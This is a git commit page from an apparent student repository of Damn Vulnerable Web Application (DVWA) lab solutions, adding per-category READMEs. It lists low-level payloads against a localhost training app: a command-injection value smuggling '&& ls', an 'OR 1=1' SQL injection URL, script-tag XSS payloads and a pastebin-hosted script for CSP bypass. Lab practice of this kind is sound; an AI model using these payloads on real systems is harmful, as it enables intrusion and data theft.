feat: 🚚 Create readme for each categories and clean repo

This commit is contained in:
2023-12-08 11:06:11 +01:00
parent f0641e7694
commit a4dbe0e5dc
11 changed files with 72 additions and 5 deletions

11
CSP Bypass/README.md Normal file
View File

@ -0,0 +1,11 @@
# Low
```javascript
console.log("Welcome the the hacking word");
```
> Upload this script to pastebin
# Medium
> In progress
# High
> In progress

View File

@ -1,2 +0,0 @@
console.log("Welcome the the hacking word");
// Export this script to pastebin

View File

@ -0,0 +1,10 @@
# Low
```bash
127.0.0.1 && ls
```
# Medium
> In progress
# High
> In progress

8
File injection/README.md Normal file
View File

@ -0,0 +1,8 @@
# Low
Just upload the file `file-inject-low.png` and you will get the flag.
# Medium
> In progress
# High
> In progress

View File

@ -1,3 +1,12 @@
# Low
```javascript
const phrase = document.getElementById("phrase").value; const phrase = document.getElementById("phrase").value;
const token = md5(rot13(phrase)); const token = md5(rot13(phrase));
console.log(token); console.log(token);
```
# Medium
> In progress
# High
> In progress

9
README.md Normal file
View File

@ -0,0 +1,9 @@
# EPITA-DVWA
My journey through application vulnerability using Damn Vulnerable Web Application (DVWA).
## What is DVWA?
DVWA is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
## How this repository is organized?
This repository is organized by the different vulnerabilities that I have found in DVWA. Each vulnerability has its own folder and contains a README.md file that explains the vulnerability and how to exploit it.

7
SQL Injection/README.md Normal file
View File

@ -0,0 +1,7 @@
# Low
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
# Medium
> In progress
# High
> In progress

View File

@ -1 +0,0 @@
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#

8
XSS (DOM)/README.md Normal file
View File

@ -0,0 +1,8 @@
# Low
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
# Medium
> In progress
# High
> In progress

View File

@ -1 +0,0 @@
http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>

9
XSS (Stored)/README.md Normal file
View File

@ -0,0 +1,9 @@
# Low
```javascript
<script>alert("XSS");</script>
````
# Medium
> In progress
# High
> In progress